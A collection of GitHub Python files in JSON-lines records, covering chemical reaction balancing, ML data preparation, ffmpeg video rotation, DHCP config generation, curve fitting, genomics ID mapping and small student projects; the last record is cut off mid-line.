msgp+=['Unmapped species from RHS: '+', '.join([str(ID) for ID in removedprods])]\n if punmapped:\n msgp+=['Unmapped species instances from RHS: '+', '.join([str(ID) for ID in punmapped])]\n msg=msgr+msgp\n if not msg:\n msg='Valid'\n else:\n msg=', '.join(msg)\n return LHSdata,RHSdata,msg\n\ndef gensmilesfreq(specdict,validate=True):\n '''\n Generates smile frequency dictionary (Sometimes species have the same SMILES with different IDs eg. mixture vs pure)\n\n '''\n smilesfreq={}\n for ID0 in specdict:\n specsmiles=specdict[ID0]['smiles']\n specsmiles=specsmiles.split('.')\n for specsmile in specsmiles:\n if validate:\n specsmile=Chem.MolToSmiles(molfromsmiles(specsmile))\n if specsmile in smilesfreq:\n smilesfreq[specsmile].extend([ID0])\n else:\n smilesfreq.update({specsmile:[ID0]})\n return smilesfreq\n\n\ndef updatespecdict(refdict,smilesfreq,cleanmol,mappedmol,updateddict=OrderedDict({}),mixtures={},hcarriers=[],updateall=True):\n '''\n Updates species dictionary based on given reactant and cleaned molecule from a reaction\n hcarriers (list of hydrogen containing species involved in reaction but not mapped)\n '''\n foundmatch=False\n specsmiles=Chem.MolToSmiles(molfromsmiles(Chem.MolToSmiles(cleanmol))) #Ensuring RDKit smiles\n # breakpoint()\n if specsmiles not in smilesfreq:\n ID0=''\n msg='Smiles discrepancy for species'\n else:\n idx=''\n msg='Valid'\n IDlist=smilesfreq[specsmiles]\n mixtures_=['.' in refdict[ID0]['smiles'] for ID0 in IDlist]\n if len(IDlist)>1: #Try mixtures first\n pure=[ID0 for i,ID0 in enumerate(IDlist) if not mixtures_[i]] #Pure matches\n if any(mixtures):\n for i,ID0 in enumerate(IDlist):\n if mixtures_[i] and ID0 in mixtures:\n if specsmiles in mixtures[ID0]:\n loccount=len(mixtures[ID0][specsmiles])\n else:\n loccount=0\n if any([len(mixtures[ID0][specsmiles_])>loccount for specsmiles_ in mixtures[ID0]]):\n idx=i\n break\n if not idx and not pure:\n for i,ID0 in enumerate(IDlist):\n if mixtures_[i] and ID0 not in mixtures:\n idx=i\n break\n if not idx and pure:\n for i,ID0 in enumerate(IDlist):\n if not mixtures_[i] and ID0 not in updateddict:\n idx=i\n break\n if not idx:\n idx=0\n else:\n idx=0\n ID0=IDlist[idx]\n #New\n if hcarriers and ID0 not in hcarriers and not any([atom.HasProp('molAtomMapNumber') for atom in mappedmol.GetAtoms()]):\n return updateddict,mixtures,msg,ID0\n #New\n mixture=mixtures_[idx]\n if updateall:\n mappedsmiles=Chem.MolToSmiles(mappedmol)\n if mixture:\n if ID0 not in mixtures:\n updateddict.update({ID0:copy.deepcopy(refdict[ID0])})\n updateddict[ID0]['mixture']=mixture\n mixtures.update({ID0:{specsmiles:[(mappedsmiles,cleanmol)]}})\n elif specsmiles not in mixtures[ID0]:\n mixtures[ID0].update({specsmiles:[(mappedsmiles,cleanmol)]})\n else:\n mixtures[ID0][specsmiles].extend([(mappedsmiles,cleanmol)])\n else:\n if ID0 not in updateddict:\n updateddict.update({ID0:copy.deepcopy(refdict[ID0])})\n updateddict[ID0]['mixture']=mixture\n updateddict[ID0]['count']=1\n updateddict[ID0].update({'mappedsmiles':[mappedsmiles],'cleanmol':[cleanmol]})\n else:\n updateddict[ID0]['count']+=1\n updateddict[ID0]['mappedsmiles'].extend([mappedsmiles])\n updateddict[ID0]['cleanmol'].extend([cleanmol])\n else:\n if mixture:\n if ID0 not in mixtures:\n updateddict.update({ID0:copy.deepcopy(refdict[ID0])})\n updateddict[ID0]['mixture']=mixture\n mixtures.update({ID0:{specsmiles:[()]}})\n elif specsmiles not in mixtures[ID0]:\n mixtures[ID0].update({specsmiles:[()]})\n else:\n mixtures[ID0][specsmiles].extend([()])\n else:\n if ID0 not in updateddict:\n updateddict.update({ID0:copy.deepcopy(refdict[ID0])})\n updateddict[ID0]['mixture']=mixture\n updateddict[ID0]['count']=1\n else:\n updateddict[ID0]['count']+=1\n return updateddict,mixtures,msg,ID0\n\n\ndef updaterxns(analoguerxnsparsed,hc_prod={},analoguerxns=None,ncpus=16,restart=True):\n '''\n Updates reactions if there are unmapped species and balances if there are changes (optional)\n\n '''\n # breakpoint()\n if analoguerxns is not None:\n analoguerxnsparsed=updatecolumns(analoguerxns,analoguerxnsparsed,cols=['Rdata','Rgtdata','Solvdata'])\n if ncpus>1:\n if restart:\n initray(num_cpus=ncpus)\n analoguerxnsparseddis=mpd.DataFrame(analoguerxnsparsed)\n else:\n analoguerxnsparseddis=analoguerxnsparsed\n updatedrxn=analoguerxnsparseddis.apply(updaterxns_,hc_prod=hc_prod,axis=1,result_type='reduce')\n updatedrxn=pd.DataFrame(data=updatedrxn.values,index=updatedrxn.index,columns=['rxncomb'])\n analoguerxnsparsed[['mapped_rxn','confidence','balrxnsmiles','msg','LHS','RHS','hcrct','hcprod','LHSdata','RHSdata','msg1']]=pd.DataFrame(updatedrxn['rxncomb'].tolist(), index=updatedrxn.index)\n return analoguerxnsparsed\n\n\n\ndef updaterxns_(row,hc_prod={}):\n '''\n Updates reactions if there are unmapped species and balances if there are changes (optional). Assumes both\n balancerxn, maprxn and checkrxn have all been called already\n\n '''\n # breakpoint()\n msg1=copy.deepcopy(row['msg1'])\n msg=copy.deepcopy(row['msg']) #Balanced output message\n LHSdata=copy.deepcopy(row['LHSdata'])\n RHSdata=copy.deepcopy(row['RHSdata'])\n hcprod=copy.deepcopy(row['hcprod'])\n hcrct=copy.deepcopy(row['hcrct'])\n if 'Rgtdata' in row.keys():\n Rgtdata=row['Rgtdata']\n else:\n Rgtdata={}\n if 'Solvdata' in row.keys():\n Solvdata=row['Solvdata']\n else:\n Solvdata={}\n if 'Rdata' in row.keys():\n mandrcts=row['Rdata']\n else:\n mandrcts=LHSdata\n addedspecies=list(set(LHSdata.keys())-set(mandrcts.keys()))\n # breakpoint()\n storemsg=''\n i=0\n while 'Unmapped' in msg1 or i==0: #Unmapped species exist not reflected\n if 'from RHS' in msg1: #Mandatory products unmapped\n storemsg=msg1\n if 'Smiles discrepancy' in msg1:\n break\n if hcprod is not None:\n hcprod=[hcprod_ for hcprod_ in hcprod if hcprod_ in RHSdata]\n hcrct=[hcrct_ for hcrct_ in hcrct if hcrct_ in LHSdata]\n balrxnsmiles,msg,LHS,RHS,hcrct,hcprod,LHSdata,RHSdata=balancerxn(LHSdata,RHSdata,first=False,Rgtdata=Rgtdata,Solvdata=Solvdata,addedspecies=addedspecies,hc_prod=hc_prod,coefflim=6,mandrcts=mandrcts,usemapper=False,ignoreH=False)\n mappedrxn=maprxn([balrxnsmiles])[0]\n if mappedrxn=='Error':\n mapped_rxn='Error'\n conf='Error'\n msg1='Mapping error'\n break\n else:\n mapped_rxn=mappedrxn.get('mapped_rxn')\n conf=mappedrxn.get('confidence')\n if 'With hydrogen carriers' in msg:\n hcarriers=[int(hcarrier) for hcarrier in msg.split('With hydrogen carriers: ')[1].split(', ')[0].split(',')]\n else:\n hcarriers=[]\n LHSdata,RHSdata,msg1=checkrxn(mapped_rxn,Rdata=LHSdata,Pdata=RHSdata,updateall=True,removeunmapped=True,mandrcts=mandrcts,hcarriers=hcarriers)\n if storemsg:\n if msg1=='Valid':\n msg1=storemsg\n else:\n msg1=storemsg+', '+msg1\n break\n i+=1\n return mapped_rxn,conf,balrxnsmiles,msg,LHS,RHS,hcrct,hcprod,LHSdata,RHSdata,msg1\n\ndef updatecolumns(parent,child,cols=[],config=[],reaxys_update=True):\n# def updatecolumns(parent,child,cols=[],config=[],reaxys_update=False):\n # breakpoint()\n if reaxys_update:\n idxcol=['ReactionID','Instance']\n else:\n idxcol=['ReactionID']\n if (parent.index.names!=idxcol and len(idxcol)>1) or (parent.index.name!=idxcol and len(idxcol)==1):\n if (parent.index.name and None not in parent.index.name) or (parent.index.names and None not in parent.index.names):\n parent.reset_index(inplace=True)\n parent.set_index(idxcol,inplace=True)\n if (child.index.names!=idxcol and len(idxcol)>1) or (child.index.name!=idxcol and len(idxcol)==1):\n if (child.index.name and None not in child.index.name) or (child.index.names and None not in child.index.names):\n child.reset_index(inplace=True)\n child.set_index(idxcol,inplace=True)\n if type(parent)==str:\n parent=pd.read_pickle(parent)\n if type(child)==str:\n child=pd.read_pickle(child)\n child[cols]=copy.deepcopy(parent[cols])\n if config:\n child=child[config]\n return child\n\n","repo_name":"chonghuanzhang/balancing_rxn","sub_path":"chem_balancer/MapRxns.py","file_name":"MapRxns.py","file_ext":"py","file_size_in_byte":26233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11495316286","text":"import pandas as pd\nfrom app.src.features.feature_engineering import feature_engineering\nfrom app import init_cols\nfrom app.src.utils.utils import load_model_config\nimport pickle\n\n\ndef make_dataset(data, artifacts_path):\n\n \"\"\"\n Función que permite crear el dataset usado para el entrenamiento\n del modelo.\n\n Args:\n data (List): Lista con la observación llegada por request.\n artifacts_path (str): Ruta local a los artefactos del modelo\n\n Returns:\n DataFrame. Dataset a inferir.\n \"\"\"\n model_info = load_model_config()\n print(\"---> Getting data\")\n data_df = get_raw_data_from_request(data)\n print(\"---> Transforming data\")\n data_df = transform_data(data_df, artifacts_path, model_info[\"cols_to_remove\"])\n print(\"---> Feature engineering\")\n data_df = feature_engineering(data_df)\n print(\"---> Preparing data for training\")\n data_df = pre_train_data_prep(data_df, artifacts_path)\n\n return data_df.copy()\n\n\ndef get_raw_data_from_request(data):\n\n \"\"\"\n Función para obtener nuevas observaciones desde request\n\n Args:\n data (List): Lista con la observación llegada por request.\n\n Returns:\n DataFrame. Dataset con los datos de entrada.\n \"\"\"\n return pd.DataFrame(data, columns=init_cols)\n\n\ndef transform_data(data_df, artifacts_path, cols_to_remove):\n \"\"\"\n Función que permite realizar las primeras tareas de transformación\n de los datos de entrada.\n\n Args:\n data_df (DataFrame): Dataset de entrada.\n artifacts_path (str): Ruta local a los artefactos del modelo\n cols_to_remove (list): Columnas a retirar.\n\n Returns:\n DataFrame. Dataset transformado.\n \"\"\"\n\n print(\"------> Removing unnecessary columns\")\n data_df = remove_unwanted_columns(data_df, cols_to_remove)\n\n data_df[\"Pclass\"] = data_df[\"Pclass\"].astype(str)\n\n # creando dummies originales\n print(\"------> Encoding data\")\n print(\"---------> Getting encoded columns from MLFlow\")\n # obteniendo las columnas presentes en el entrenamiento desde MLFlow\n with open(f\"{artifacts_path}/encoded_columns.pkl\", \"rb\") as inp:\n enc_cols = pickle.load(inp)\n # columnas dummies generadas en los datos de entrada\n data_df = pd.get_dummies(data_df)\n\n # agregando las columnas dummies faltantes en los datos de entrada\n data_df = data_df.reindex(columns=enc_cols, fill_value=0)\n\n return data_df.copy()\n\n\ndef pre_train_data_prep(data_df, artifacts_path):\n\n \"\"\"\n Función que realiza las últimas transformaciones sobre los datos\n antes del entrenamiento (imputación de nulos)\n\n Args:\n data_df (DataFrame): Dataset de entrada.\n artifacts_path (str): Ruta local a los artefactos del modelo.\n\n Returns:\n DataFrame. Datasets de salida.\n \"\"\"\n data_df = input_missing_values(data_df, artifacts_path)\n\n return data_df.copy()\n\n\ndef input_missing_values(data_df, artifacts_path):\n\n \"\"\"\n Función para la imputación de nulos\n\n Args:\n data_df (DataFrame): Dataset de entrada.\n artifacts_path (str): Ruta local a los artefactos del modelo\n\n Returns:\n DataFrame. Datasets de salida.\n \"\"\"\n\n print(\"------> Inputing missing values\")\n # obtenemos el objeto SimpleImputer desde MLFlow\n print(\"------> Getting imputer from MLFlow\")\n with open(f\"{artifacts_path}/imputer.pkl\", \"rb\") as inp:\n imputer = pickle.load(inp)\n data_df = pd.DataFrame(imputer.transform(data_df), columns=data_df.columns)\n\n return data_df.copy()\n\n\ndef remove_unwanted_columns(df, cols_to_remove):\n \"\"\"\n Función para quitar variables innecesarias\n\n Args:\n df (DataFrame): Dataset.\n cols_to_remove: List(srt). Columnas a eliminar.\n\n Returns:\n DataFrame. Dataset.\n \"\"\"\n return df.drop(columns=cols_to_remove)\n","repo_name":"JavierGCLG/Proyecto_CicloDeVida_UEM_TRAIN","sub_path":"app/src/data/predict/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37648486200","text":"from person import Person\nfrom party import Party\n\nglobal users, parties, user1, user2, user3, user4, party1, party2, party3, party4\n\nuser1 = Person(\"John Peterson\", \"123\")\nuser2 = Person(\"Peter Johnson\", \"321\")\nuser3 = Person(\"Eva Jackson\", \"456\")\nuser4 = Person(\"Jackie Evans\", \"654\")\n\nparty1 = Party(\"Oaks\", 0)\nparty2 = Party(\"Lakes\", 0)\nparty3 = Party(\"Foxes\", 0)\nparty4 = Party(\"Stars\", 0)\n\nusers = [user1, user2, user3, user4]\nparties = [party1, party2, party3, party4]\n","repo_name":"r426/Week_12_Voting_System","sub_path":"globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26354642430","text":"\"\"\"Rotate the video files in a folder\nThis requires `ffmpeg` available in the system path.\n\"\"\"\nimport subprocess\nimport pathlib\nimport argparse\n\n\ndef rotate(files: list[pathlib.Path], out_folder: pathlib.Path,\n speed: str, transpose: int) -> None:\n \"\"\"rotate the video files and generate them into out_folder\n\n Args:\n files (list[pathlib.Path]): The video files to be rotated.\n out_folder (pathlib.Path): Must be an empty folder.\n It will be created if not exists yet.\n speed (str): Usually be one of ultrafast and fast.\n transpose (int): 1 is 90 clock-wise; 2 is 90 counter clock-wise.\n See more in https://ffmpeg.org/ffmpeg-filters.html#toc-transpose-1\n\n Raises:\n FileExistsError: May throw when `out_folder` is not empty or can't\n be made.\n FileNotFoundError: May throw when `files` doesn't exist.\n \"\"\"\n out_folder = out_folder.expanduser()\n out_folder.mkdir(exist_ok=True)\n if not out_folder.exists():\n raise FileExistsError(f\"Fail to create folder {out_folder}\")\n if len(list(out_folder.iterdir())) > 0:\n raise FileExistsError(f\"out_folder is not empty ({out_folder})\")\n for file in files:\n if not file.exists():\n raise FileNotFoundError(f\"{file}\")\n n = len(files)\n print(f\"There're {n} files in total.\")\n for (i, file) in enumerate(files):\n print(f\"Rotating {i+1} of {n}...\")\n out_file = out_folder / file.name\n cmd: list[str] = [\"ffmpeg\", \"-i\", str(file),\n \"-loglevel\", \"fatal\", \"-nostats\", # to be less verbose\n \"-c:v\", \"libx264\",\n \"-preset\", f\"{speed}\",\n \"-vf\", f\"transpose={transpose}\",\n str(out_file)]\n subprocess.run(cmd, check=True)\n print(f\"All {n} files are done.\")\n\n\ndef get_files(x: str) -> list[pathlib.Path]:\n folder = pathlib.Path(x).expanduser()\n if not folder.exists():\n raise FileExistsError(folder)\n\n def isfile_notdot(f: pathlib.Path) -> bool:\n return f.is_file() and f.name[0] != \".\"\n out = list(filter(isfile_notdot, folder.iterdir()))\n out.sort()\n return out\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-t', '--transpose', type=int, default=2,\n help=\"1 is 90 clock-wise; 2 (default) is 90 counter clock-wise. \"\n \"See more in https://ffmpeg.org/ffmpeg-filters.html#toc-transpose-1\")\n parser.add_argument(\n '-s', '--speed', type=str, default=\"ultrafast\",\n help=\"Should be one of fast and ultrafast (default)\")\n parser.add_argument(\n 'ffolder', help=\"The folder contains the video files to be rotated\")\n parser.add_argument(\n 'tfolder', help=\"The folder where the rotated files to be generated into\")\n options = parser.parse_args()\n files = [pathlib.Path(f) for f in get_files(options.ffolder)]\n out_folder = pathlib.Path(options.tfolder)\n rotate(files, out_folder, options.speed, options.transpose)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shrektan/py-scripts","sub_path":"rotate_video.py","file_name":"rotate_video.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8870554165","text":"import train_original\nimport train_custom\nimport test_original\nimport test_custom\nimport mAP_evaluation\n\n\ndef main():\n print(\"Yolov3 comparison solution!\")\n print(\"Goal of this solution is to make comparison in between 2 object detection algorithms\")\n print(\"Solution compare Yolov3 original version and Yolov3 custom with some general improvements\")\n print(\"\")\n print(\"What do you want to do? (Press 1-8 and enter)\")\n print(\"1-train original algorithm\")\n print(\"2-train custom algorithm\")\n print(\"3-test original algorithm\")\n print(\"4-test custom algorithm\")\n print(\"5-evaluate original algorithm against noised images\")\n print(\"6-evaluate custom algorithm against noised images\")\n choice = input()\n\n if choice == '1':\n train_original.main_train_original()\n elif choice == '2':\n train_custom.main_train_custom()\n elif choice == '3':\n test_original.main_test_original()\n elif choice == '4':\n test_custom.main_test_custom()\n elif choice == '5':\n mAP_evaluation.evaluate(0, 1)\n elif choice == '6':\n mAP_evaluation.evaluate(1, 1)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Deny71/YoloV3_CustomModel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42055863077","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef _mmq(y, gs, sigs):\n\n D = (1/np.power(sigs, 2)) * np.dot(y, gs.T)\n\n M = (1/np.power(sigs, 2)) * np.dot(gs, gs.T)\n\n covariance_matrix = np.linalg.inv(M)\n\n adjusted_params = np.dot(covariance_matrix, D)\n\n chi_square = np.sum(np.power((1/sigs)*(y - np.dot(adjusted_params.T, gs)), 2))\n\n degrees_of_freedom = gs.shape[1] - gs.shape[0]\n\n return adjusted_params, covariance_matrix, chi_square, degrees_of_freedom\n\nfig, ax = plt.subplots(2, figsize=(20, 15))\n\ndata = pd.read_csv('dados_osciloscópio.tsv', sep='\\t')\ny = data['Tensão (V)']\nt = data['Tempo (s)']\nsigma_y = 0.06 #V\n\nax[0].errorbar(t, y, yerr=[sigma_y]*len(y), fmt='b-')\n\nf = 2 #Hz\n\ng1 = np.cos(2*np.pi*f*t)\ng2 = np.sin(2*np.pi*f*t)\n\ngs = np.array([g1, g2])\n\nparams, cov_mat, chi, ngl = _mmq(y, gs, sigma_y)\n\na1 = params[0]\na2 = params[1]\n\nsigma_a1 = np.sqrt(cov_mat[0,0])\nsigma_a2 = np.sqrt(cov_mat[1,1])\n\ncovariance = cov_mat[0,1]\ncorrelation = covariance/(sigma_a1*sigma_a2)\n\nA = np.sqrt(np.power(a1, 2) + np.power(a2, 2))\n\nda1 = a1*sigma_a1/A\nda2 = a1*sigma_a2/A\n\nsigma_A = np.sqrt( np.power(da1, 2) + np.power(da2, 2) + 2*da1*da2*covariance)\n\nF_t = a1*np.cos(2*np.pi*f*t) + a2*np.sin(2*np.pi*f*t)\n\nsigma_F = np.sqrt(np.power(np.cos(2*np.pi*f*t)*sigma_a1, 2) + np.power(np.sin(2*np.pi*f*t)*sigma_a2, 2))\n\nax[0].errorbar(t, F_t, yerr=sigma_F, fmt='r-')\n\nsigma_R = np.sqrt(sigma_y**2 + (sigma_F)**2)\n\nax[1].plot(t, y - F_t, 'o')\nax[1].axhline(y=0, c='black')\n\nplt.show()","repo_name":"PedroHGMachado/tedfe","sub_path":"atividades/atividade24/atividade24.py","file_name":"atividade24.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15371894284","text":"import pandas\nimport statsmodels.formula.api as smf\n\nquantidade_lida = 10000\n\n\ndef ler_arquivo(nome_arquivo):\n csv = pandas.read_csv(\n f\"../dados/micro_dados_{nome_arquivo}.csv\",\n # nrows=quantidade_lida,\n engine=\"c\",\n na_filter=False,\n )\n return csv\n\n\ndef calcular_modelo(csv, nome_arquivo):\n resposta = \"falta ~\"\n resultados = []\n for i, campo in enumerate(campos):\n formula = resposta + \" + \".join(campo)\n resultado_tmp = smf.logit(formula, csv).fit()\n with open(f\"../modelos/{nome_arquivo}_{i+1}.txt\", \"w\") as file:\n file.write(resultado_tmp.summary().as_text())\n file.close()\n resultados.append(resultado_tmp)\n return resultados\n\n\ncampos = [\n [\n \"C(TP_SEXO)\",\n \"C(TP_COR_RACA)\",\n \"salario\",\n \"C(automovel)\",\n \"IDHM\",\n \"PIB\",\n \"densidade\"\n ],\n]\nif __name__ == \"__main__\":\n arquivo = \"2019\"\n csv = ler_arquivo(arquivo)\n calcular_modelo(csv, arquivo)\n","repo_name":"tredeneo/utfpr","sub_path":"ciencias_de_dados/04 - Pesquisa/enem_socio_economico/codigos/modelagem.py","file_name":"modelagem.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"25257477419","text":"'''\n© Anthrino > DHCP configuration file generator\n'''\nimport sys\nimport json\nfrom random import randint\nfrom pprint import pprint\n\n# import configparser\n# parser = configparser.ConfigParser()\n# config = parser.read('/usr/local/etc/kea/kea-dhcp4.conf')\n\n'''Recursive Method to replace IP addressses in json as per pool'''\ndef replace_addr(item, index, indexB, mode):\n\n if isinstance(item, dict):\n new = {}\n for key, val in item.items():\n val = replace_addr(val, index, indexB, mode)\n new[key] = val\n return new\n\n elif isinstance(item, list):\n item = [replace_addr(i, index, indexB, mode) for i in item]\n return item\n\n elif isinstance(item, str):\n if mode == 0:\n return item.replace('192.0.2', '192.0.'+str(index+1))\n else:\n return item.replace('192.1.5', '192.'+str(indexB+1)+'.'+str(index+1))\n\n return item\n\n\ndef process_config(mode, subnet_count, shared_nw_count):\n ''' Load default sample config file '''\n with open('kea-dhcp4-bkp.conf') as def_config:\n conf_str = ''\n for x in def_config.readlines():\n if not x.strip().startswith('//'):\n conf_str += x\n\n def_config = json.loads(conf_str)\n # pprint(config)\n\n ''' Subnet/shared nw templates for generation'''\n subnet_config = def_config['Dhcp4']['subnet4'][0]\n subnet_config_min = def_config['Dhcp4']['shared-networks'][0]['subnet4'][0]\n shared_nw_config = def_config['Dhcp4']['shared-networks'][0]\n\n ''' Initialize empty lists to contain new config'''\n def_config['Dhcp4']['subnet4'] = []\n def_config['Dhcp4']['shared-networks'] = []\n sn_id = 0\n\n ''' Loop to Generate subnets'''\n for i in range(subnet_count % 256):\n # pprint(replace_addr(subnet_config, i))\n sn_id += 1\n new_subnet = replace_addr(subnet_config, i, 0, 0)\n new_subnet['id'] = sn_id\n def_config['Dhcp4']['subnet4'].append(new_subnet)\n\n ''' Loop to generate shared nws'''\n for i in range(shared_nw_count % 256):\n shared_nw_config['subnet4'] = []\n for j in range(randint(1, 5)):\n sn_id += 1\n new_subnet = replace_addr(subnet_config_min, j, i, 1)\n new_subnet['id'] = sn_id\n shared_nw_config['subnet4'].append(new_subnet)\n shared_nw_config['name'] = 'subnet-cluster'+str(i+1)\n # print(i ,[(x['id'], x['subnet']) for x in shared_nw_config['subnet4']])\n\n def_config['Dhcp4']['shared-networks'].append(dict(shared_nw_config))\n def_config['Dhcp4']['shared-networks']\n # for y in def_config['Dhcp4']['shared-networks']:\n # print(i ,[(x['id'], x['subnet']) for x in y['subnet4']])\n\n if mode == 0:\n ''' Print generated config'''\n pprint(def_config)\n # print()\n\n elif mode == 1:\n ''' Write generated config to file'''\n with open('/usr/local/etc/kea/kea-dhcp4.conf', 'w') as file:\n json.dump(def_config, file)\n\n else:\n ''' Dislpay exisitng config file'''\n with open('/usr/local/etc/kea/kea-dhcp4.conf', 'r') as file:\n pprint(json.loads(file.read()))\n\n\nif __name__ == '__main__':\n ''' Read command line args [mode, subnet_count, shared_nw_count] and call processor'''\n process_config(int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]))\n","repo_name":"isc-projects/kea-anterius","sub_path":"tests/dhcp_config_gen.py","file_name":"dhcp_config_gen.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"81"} +{"seq_id":"14092788352","text":"# -*- coding: utf-8 -*-\n'''\nTlang_PDownton_1_4_2: Read and show an image.\n'''\nimport PIL.ImageDraw\nimport PIL\nimport matplotlib.pyplot as plt \nimport os.path\nimport numpy as np # “as” lets us use standard abbreviations\nimport matplotlib.colors as pltc\n'''Read the image data'''\n# Get the directory of this python script\ndirectory = os.getcwd()\nnew_directory = os.path.join(directory, 'modified')\ntry:\n os.mkdir(new_directory)\nexcept OSError:\n pass # if the directory already exists, proceed \n# Build an absolute filename from directory + filename\nfilename2 = os.path.join(directory, str(pngimg_com.jpg))\n# Read the image data into an array\nimg = plt.imread(filename2)\nimage = PIL.Image.open(filename2)\nfilename, filetype = filename2.split('.')\nif filetype != 'png':\n new_image_filename = os.path.join(new_directory, filename + '.png')\n image.save(new_image_filename)\n img = plt.imread(os.path.join(directory, filename2 + '.png'))\nheight = len(img)\nwidth = len(img[0])\nfor r in range(height):\n for c in range(width):\n if sum(img[r][c])==765: # brightness R+G+B goes up to 3*255=765\n img[r][c]=(0,0,0,0)\n# Create figure with 2 subplots\nfig, axes = plt.subplots(1,1)\n# Show the image data in the first subplot\naxes.imshow(img, interpolation='none')\n# Show the figure on the screen\nfig.show()\n","repo_name":"PatDown/Pdownton_Tlang","sub_path":"TLang_PDownton_1_4_2.py","file_name":"TLang_PDownton_1_4_2.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7566208218","text":"#! python3\n# refseq_prot_nuc_id_switch.py\n# Parses a text file containing RefSeq protein or nucleotide IDs\n# and associates it to its respective nucleotide or protein ID\n# (depending on input)\n\nimport os, argparse\n\n# Define functions for later use\ndef validate_args(args):\n # Validate input file locations\n if not os.path.isfile(args.inputFileName):\n print('I am unable to locate the input text file (' + args.inputFileName + ')')\n print('Make sure you\\'ve typed the file name or location correctly and try again.')\n quit()\n if not os.path.isfile(args.gff3FileName):\n print('I am unable to locate the input gff3 file (' + args.gff3FileName + ')')\n print('Make sure you\\'ve typed the file name or location correctly and try again.')\n quit()\n # Handle file overwrites\n if os.path.isfile(args.outputFileName):\n print(args.outputFileName + ' already exists. Delete/move/rename this file and try again.')\n quit()\n\ndef parse_text_to_list(fileName):\n outputList = []\n with open(fileName, \"r\") as fileIn:\n for line in fileIn:\n outputList.append(line.rstrip('\\r\\n'))\n return outputList\n\ndef parse_refseq_gff3_prot_nuc_ids(fileName):\n GFF3_MRNA_LINE_LEN = 9\n #PREFIX_TO_STRIP = \"rna-\"\n idsDict = {}\n with open(fileName, \"r\") as fileIn:\n for line in fileIn:\n # Make line able to be handled\n sl = line.rstrip('\\r\\n').split('\\t')\n # Skip irrelevant lines\n if len(sl) != GFF3_MRNA_LINE_LEN:\n continue\n # Extract relevant info from CDS lines\n if sl[2] == \"CDS\":\n # Explode details into a dict\n details = sl[8].split(';')\n detail_dict = {}\n for i in range(len(details)):\n if details[i] == '':\n continue\n split_details = details[i].split('=', maxsplit=1)\n detail_dict[split_details[0]] = split_details[1]\n # Obtain nuc and prot IDs\n #nucID = detail_dict[\"Parent\"][len(PREFIX_TO_STRIP):]\n nucID = detail_dict[\"Parent\"]\n protID = detail_dict[\"protein_id\"]\n # Associate IDs in main dict\n idsDict[nucID] = protID\n idsDict[protID] = nucID\n return idsDict\n\n\n##### USER INPUT SECTION\n\nusage = \"\"\"%(prog)s reads a text file listing RefSeq feature IDs, either protein\nor nucleotide, and using the parent .gff file it will switch these ID types around,\nreturning a new text file.\n\"\"\"\np = argparse.ArgumentParser(description=usage)\np.add_argument(\"-i\", dest=\"inputFileName\",\n help=\"Input text file name\")\np.add_argument(\"-g\", dest=\"gff3FileName\",\n help=\"Input gff3 file name\")\np.add_argument(\"-o\", dest=\"outputFileName\",\n help=\"Output text file name\")\np.add_argument(\"--warning\", dest=\"warning\", action='store_true', default=False,\n help=\"Specify if you want the program to warn you when an ID was not found in the gff3\")\n\nargs = p.parse_args()\nvalidate_args(args)\n\n# Parse input text file\nidsList = parse_text_to_list(args.inputFileName)\n\n# Parse input gff3 file\nidsDict = parse_refseq_gff3_prot_nuc_ids(args.gff3FileName)\n\n# Output file with inverted IDs (where possible)\nwith open(args.outputFileName, \"w\") as fileOut:\n for listID in idsList:\n abbrevID = listID.split(\" \")[0] # RefSeq IDs are commonly the first bit before whitespace\n if abbrevID in idsDict:\n fileOut.write(idsDict[abbrevID] + '\\n')\n else:\n try:\n fileOut.write(idsDict[listID] + '\\n')\n except:\n if args.warning:\n print(\"Warning: {0} not found in gff3\".format(listID))\n\n# All done!\nprint('Program completed successfully!')\n","repo_name":"zkstewart/Genome_analysis_scripts","sub_path":"gene_annotation_pipeline/gemoma/refseq_prot_nuc_id_switch.py","file_name":"refseq_prot_nuc_id_switch.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"11625566165","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# import seaborn as sns\nfrom sklearn import datasets\nfrom Logistic_Regression import LogisticRegression\n\niris = datasets.load_iris()\n\nX = iris.data[:, :2]\ny = (iris.target != 0) *1\n\nclf = LogisticRegression()\nclf.fit(X,y)\n\npred = clf.predict(X)\n\n\nplt.figure(figsize=(10, 6))\nplt.scatter(X[y == 0][:, 0], X[y == 0][:, 1], color='b', label='0')\nplt.scatter(X[y == 1][:, 0], X[y == 1][:, 1], color='r', label='1')\nplt.legend()\nx1_min, x1_max = X[:,0].min(), X[:,0].max(),\nx2_min, x2_max = X[:,1].min(), X[:,1].max(),\nxx1, xx2 = np.meshgrid(np.linspace(x1_min, x1_max), np.linspace(x2_min, x2_max))\ngrid = np.c_[xx1.ravel(), 